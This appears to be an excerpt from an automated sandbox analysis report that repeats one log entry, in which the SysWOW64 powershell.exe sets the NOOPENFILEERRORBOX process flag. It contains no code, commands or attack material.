                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
